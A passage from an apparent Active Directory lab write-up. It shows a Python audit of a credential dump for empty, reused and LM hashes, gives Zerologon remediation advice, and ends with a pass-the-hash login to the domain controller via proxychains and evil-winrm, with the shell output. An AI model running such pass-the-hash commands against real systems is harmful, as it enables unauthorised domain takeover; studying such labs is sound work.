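    findings = {"empty_password": [], "machine_empty_password": [], "shared_hash": [], "lm_stored": []}
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
        if e["nt"] == EMPTY_NT:
            findings["empty_password"].append(e["user"])
            if e["user"].endswith("$"):          # a machine account never has this legitimately
                findings["machine_empty_password"].append(e["user"])
        if e["lm"] != EMPTY_LM:
            findings["lm_stored"].append(e["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:    # same password reused across accounts
            findings["shared_hash"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for kind, hits in audit_dump(parse_dump(SAMPLE_DUMP)).items():
        print(f"{kind}: {hits}")
```

Guest showing up under `empty_password` is normal as long as the account stays disabled; a domain controller showing up under `machine_empty_password` is the Zerologon aftermath and calls for resetting the DC's machine password (Reset-ComputerMachinePassword on the DC, then replication checks) on top of the Netlogon secure-channel enforcement from the August 2020 updates, because every DCSync shown on this page was possible with that empty password alone.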

Now, as the user mr3ks or as any domain admin user such as p00_adm, we can connect to the DC over WinRM with pass-the-hash.

❯ proxychains -q evil-winrm -i intranet.poo -u mr3ks -H 1f989b7c5df25598ad816e342f69e090  
PS C:\Users\mr3ks\Documents> whoami
poo\mr3ks
PS C:\Users\mr3ks\Documents> hostname
DC
PS C:\Users\mr3ks\Documents>